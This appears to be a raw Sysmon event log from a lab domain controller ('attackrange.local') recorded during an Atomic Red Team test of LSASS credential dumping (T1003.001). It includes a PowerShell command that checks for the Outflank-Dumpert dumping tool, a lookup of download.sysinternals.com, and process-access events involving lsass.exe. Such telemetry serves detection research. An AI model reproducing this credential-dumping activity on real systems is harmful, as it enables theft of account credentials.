21:09:55.448{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:55.417{4DB9351A-A323-60D3-3206-00000000CF01}4356\PSHost.132689561953369070.4356.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.401{4DB9351A-A323-60D3-3206-00000000CF01}4356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qsjq1avr.exg.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.401{4DB9351A-A323-60D3-3206-00000000CF01}4356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gd3wwzfe.xcf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.401{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gd3wwzfe.xcf.ps12021-06-23 21:09:55.401 10341000x800000000000000024940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.370{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.339{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.339{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.336{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.229{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.180{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61525-false152.199.4.33-443https 354300x800000000000000024928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.153{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55677- 10341000x800000000000000024927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.167{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.167{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.120{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.120{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:55.089{4DB9351A-A323-60D3-3106-00000000CF01}6136\PSHost.132689561950141128.6136.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.073{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vi1cg4ja.yyw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.073{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0ide3vnm.1gf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.057{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0ide3vnm.1gf.ps12021-06-23 21:09:55.057 10341000x800000000000000024919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x800000000000000024918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.170{4DB9351A-A320-60D3-2D06-00000000CF01}5160download.sysinternals.com0type: 5 az155186.vo.msecnd.net;type: 5 cs22.wpc.v0cdn.net;::ffff:152.199.4.33;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000024917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\S